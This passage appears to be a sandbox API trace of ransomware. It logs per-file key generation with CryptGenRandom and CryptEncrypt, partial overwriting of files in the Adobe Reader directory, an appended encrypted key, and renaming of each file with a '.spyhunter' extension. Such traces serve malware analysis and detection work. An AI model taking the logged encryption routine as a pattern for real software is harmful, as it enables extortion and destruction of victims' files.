10.0\\reader\\icudt40_full.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\icudt40_full.dll.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\icudt40_full.dll.spyhunter")) returned 1 [0114.301] GetProcessHeap () returned 0x2c0000 [0114.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e66ef0 | out: hHeap=0x2c0000) returned 1 [0114.301] GetProcessHeap () returned 0x2c0000 [0114.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0114.301] GetProcessHeap () returned 0x2c0000 [0114.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3dd68 | out: hHeap=0x2c0000) returned 1 [0114.364] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f9a0 | out: pbBuffer=0x248f9a0) returned 1 [0114.364] GetProcessHeap () returned 0x2c0000 [0114.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0114.364] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f998*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f998*=0x30) returned 1 [0114.364] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ukr\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0114.364] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR\\DefaultID.pdf") returned 81 [0114.364] StrStrW (lpFirst="DefaultID.pdf", lpSrch=".txt") returned 0x0 [0114.378] GetProcessHeap () returned 0x2c0000 [0114.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0114.378] ReadFile (in: hFile=0xb4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f95c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f95c*=0x2800, lpOverlapped=0x0) returned 1 [0114.425] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.428] WriteFile (in: hFile=0xb4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f95c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f95c*=0x2800, lpOverlapped=0x0) returned 1 [0114.429] GetProcessHeap () returned 0x2c0000 [0114.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0114.429] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.429] WriteFile (in: hFile=0xb4, lpBuffer=0x248f99c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f95c, lpOverlapped=0x0 | out: lpBuffer=0x248f99c*, lpNumberOfBytesWritten=0x248f95c*=0x4, lpOverlapped=0x0) returned 1 [0114.576] WriteFile (in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f95c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f95c*=0x30, lpOverlapped=0x0) returned 1 [0114.576] CloseHandle (hObject=0xb4) returned 1 [0114.576] GetProcessHeap () returned 0x2c0000 [0114.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e66ef0 [0114.576] wnsprintfW (in: pszDest=0x2e66ef0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR\\DefaultID.pdf.spyhunter") returned 91 [0114.576] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ukr\\defaultid.pdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR\\DefaultID.pdf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ukr\\defaultid.pdf.spyhunter")) returned 1 [0114.577] GetProcessHeap () returned 0x2c0000 [0114.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e66ef0 | out: hHeap=0x2c0000) returned 1 [0114.577] GetProcessHeap () returned 0x2c0000 [0114.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0114.577] GetProcessHeap () returned 0x2c0000 [0114.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e42818 | out: hHeap=0x2c0000) returned 1 [0114.769] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f998 | out: pbBuffer=0x248f998) returned 1 [0114.769] GetProcessHeap () returned 0x2c0000 [0114.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0114.769] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f990*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f990*=0x30) returned 1 [0114.769] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NOR\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\nor\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0114.769] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NOR\\eula.ini") returned 70 [0114.769] StrStrW (lpFirst="eula.ini", lpSrch=".txt") returned 0x0 [0114.769] GetProcessHeap () returned 0x2c0000 [0114.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0114.769] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f954, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f954*=0x410, lpOverlapped=0x0) returned 1 [0114.788] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffbf0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.788] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x248f954, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f954*=0x410, lpOverlapped=0x0) returned 1 [0114.788] GetProcessHeap () returned 0x2c0000 [0114.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0114.788] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.788] WriteFile (in: hFile=0xec, lpBuffer=0x248f994*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f954, lpOverlapped=0x0 | out: lpBuffer=0x248f994*, lpNumberOfBytesWritten=0x248f954*=0x4, lpOverlapped=0x0) returned 1 [0114.789] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f954, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f954*=0x30, lpOverlapped=0x0) returned 1 [0114.789] CloseHandle (hObject=0xec) returned 1 [0114.789] GetProcessHeap () returned 0x2c0000 [0114.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e56ea8 [0114.789] wnsprintfW (in: pszDest=0x2e56ea8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NOR\\eula.ini.spyhunter") returned 80 [0114.789] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NOR\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\nor\\eula.ini"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NOR\\eula.ini.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\nor\\eula.ini.spyhunter")) returned 1 [0114.790] GetProcessHeap () returned 0x2c0000 [0114.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e56ea8 | out: hHeap=0x2c0000) returned 1 [0114.790] GetProcessHeap () returned 0x2c0000 [0114.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0114.790] GetProcessHeap () returned 0x2c0000 [0114.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0d6c8 | out: hHeap=0x2c0000) returned 1 [0114.793] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f990 | out: pbBuffer=0x248f990) returned 1 [0114.793] GetProcessHeap () returned 0x2c0000 [0114.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0114.793] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f988*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f988*=0x30) returned 1 [0114.793] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\UKR\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ukr\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0114.793] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\UKR\\license.html") returned 74 [0114.793] StrStrW (lpFirst="license.html", lpSrch=".txt") returned 0x0 [0114.793] GetProcessHeap () returned 0x2c0000 [0114.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0114.793] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f94c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f94c*=0x2800, lpOverlapped=0x0) returned 1 [0114.836] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.836] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f94c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f94c*=0x2800, lpOverlapped=0x0) returned 1 [0114.836] GetProcessHeap () returned 0x2c0000 [0114.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0114.836] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.836] WriteFile (in: hFile=0xec, lpBuffer=0x248f98c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f94c, lpOverlapped=0x0 | out: lpBuffer=0x248f98c*, lpNumberOfBytesWritten=0x248f94c*=0x4, lpOverlapped=0x0) returned 1 [0114.842] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f94c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f94c*=0x30, lpOverlapped=0x0) returned 1 [0114.842] CloseHandle (hObject=0xec) returned 1 [0114.850] GetProcessHeap () returned 0x2c0000 [0114.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e66ef0 [0114.850] wnsprintfW (in: pszDest=0x2e66ef0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\UKR\\license.html.spyhunter") returned 84 [0114.850] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\UKR\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ukr\\license.html"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\UKR\\license.html.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ukr\\license.html.spyhunter")) returned 1 [0114.862] GetProcessHeap () returned 0x2c0000 [0114.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e66ef0 | out: hHeap=0x2c0000) returned 1 [0114.862] GetProcessHeap () returned 0x2c0000 [0114.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0114.862] GetProcessHeap () returned 0x2c0000 [0114.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e37080 | out: hHeap=0x2c0000) returned 1 [0114.862] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f988 | out: pbBuffer=0x248f988) returned 1 [0114.862] GetProcessHeap () returned 0x2c0000 [0114.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0114.862] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f980*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f980*=0x30) returned 1 [0114.862] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SVE\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\sve\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0114.863] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SVE\\eula.ini") returned 70 [0114.863] StrStrW (lpFirst="eula.ini", lpSrch=".txt") returned 0x0 [0114.863] GetProcessHeap () returned 0x2c0000 [0114.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0114.863] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f944, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f944*=0x3f6, lpOverlapped=0x0) returned 1 [0114.945] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffc0a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.946] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x3f6, lpNumberOfBytesWritten=0x248f944, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f944*=0x3f6, lpOverlapped=0x0) returned 1 [0114.946] GetProcessHeap () returned 0x2c0000 [0114.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0114.946] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.946] WriteFile (in: hFile=0xec, lpBuffer=0x248f984*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f944, lpOverlapped=0x0 | out: lpBuffer=0x248f984*, lpNumberOfBytesWritten=0x248f944*=0x4, lpOverlapped=0x0) returned 1 [0114.946] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f944, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f944*=0x30, lpOverlapped=0x0) returned 1 [0114.946] CloseHandle (hObject=0xec) returned 1 [0114.946] GetProcessHeap () returned 0x2c0000 [0114.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e7af38 [0114.946] wnsprintfW (in: pszDest=0x2e7af38, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SVE\\eula.ini.spyhunter") returned 80 [0114.946] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SVE\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\sve\\eula.ini"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SVE\\eula.ini.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\sve\\eula.ini.spyhunter")) returned 1 [0114.947] GetProcessHeap () returned 0x2c0000 [0114.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7af38 | out: hHeap=0x2c0000) returned 1 [0114.947] GetProcessHeap () returned 0x2c0000 [0114.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0114.947] GetProcessHeap () returned 0x2c0000 [0114.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0dcb0 | out: hHeap=0x2c0000) returned 1 [0114.947] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f988 | out: pbBuffer=0x248f988) returned 1 [0114.948] GetProcessHeap () returned 0x2c0000 [0114.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0114.948] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f980*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f980*=0x30) returned 1 [0114.948] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\updater.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\updater.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0114.962] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\updater.EUQ") returned 76 [0114.962] StrStrW (lpFirst="updater.EUQ", lpSrch=".txt") returned 0x0 [0114.962] GetProcessHeap () returned 0x2c0000 [0114.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0114.962] ReadFile (in: hFile=0xec, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f944, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f944*=0x2800, lpOverlapped=0x0) returned 1 [0114.975] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.975] WriteFile (in: hFile=0xec, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f944, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f944*=0x2800, lpOverlapped=0x0) returned 1 [0114.975] GetProcessHeap () returned 0x2c0000 [0114.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0114.975] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.975] WriteFile (in: hFile=0xec, lpBuffer=0x248f984*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f944, lpOverlapped=0x0 | out: lpBuffer=0x248f984*, lpNumberOfBytesWritten=0x248f944*=0x4, lpOverlapped=0x0) returned 1 [0114.975] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f944, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f944*=0x30, lpOverlapped=0x0) returned 1 [0114.975] CloseHandle (hObject=0xec) returned 1 [0114.976] GetProcessHeap () returned 0x2c0000 [0114.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e7af38 [0114.976] wnsprintfW (in: pszDest=0x2e7af38, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\updater.EUQ.spyhunter") returned 86 [0114.976] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\updater.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\updater.euq"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\updater.EUQ.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\updater.euq.spyhunter")) returned 1 [0114.977] GetProcessHeap () returned 0x2c0000 [0114.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7af38 | out: hHeap=0x2c0000) returned 1 [0114.977] GetProcessHeap () returned 0x2c0000 [0114.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0114.977] GetProcessHeap () returned 0x2c0000 [0114.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e13ea8 | out: hHeap=0x2c0000) returned 1 [0114.977] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f980 | out: pbBuffer=0x248f980) returned 1 [0114.977] GetProcessHeap () returned 0x2c0000 [0114.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0114.977] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f978*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f978*=0x30) returned 1 [0114.977] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0114.983] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Services\\Services.asfx") returned 87 [0114.983] StrStrW (lpFirst="Services.asfx", lpSrch=".txt") returned 0x0 [0114.983] GetProcessHeap () returned 0x2c0000 [0114.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0114.983] ReadFile (in: hFile=0xb4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f93c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f93c*=0xe7, lpOverlapped=0x0) returned 1 [0114.984] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffff19, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.984] WriteFile (in: hFile=0xb4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xe7, lpNumberOfBytesWritten=0x248f93c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f93c*=0xe7, lpOverlapped=0x0) returned 1 [0114.985] GetProcessHeap () returned 0x2c0000 [0114.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0114.985] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.985] WriteFile (in: hFile=0xb4, lpBuffer=0x248f97c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f93c, lpOverlapped=0x0 | out: lpBuffer=0x248f97c*, lpNumberOfBytesWritten=0x248f93c*=0x4, lpOverlapped=0x0) returned 1 [0114.985] WriteFile (in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f93c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f93c*=0x30, lpOverlapped=0x0) returned 1 [0114.985] CloseHandle (hObject=0xb4) returned 1 [0114.985] GetProcessHeap () returned 0x2c0000 [0114.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e66ef0 [0114.986] wnsprintfW (in: pszDest=0x2e66ef0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Services\\Services.asfx.spyhunter") returned 97 [0114.986] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\services\\services.asfx"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Services\\Services.asfx.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\services\\services.asfx.spyhunter")) returned 1 [0114.986] GetProcessHeap () returned 0x2c0000 [0114.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e66ef0 | out: hHeap=0x2c0000) returned 1 [0114.986] GetProcessHeap () returned 0x2c0000 [0114.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0114.986] GetProcessHeap () returned 0x2c0000 [0114.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e10360 | out: hHeap=0x2c0000) returned 1 [0114.987] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f980 | out: pbBuffer=0x248f980) returned 1 [0114.987] GetProcessHeap () returned 0x2c0000 [0114.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0114.987] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f978*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f978*=0x30) returned 1 [0114.987] 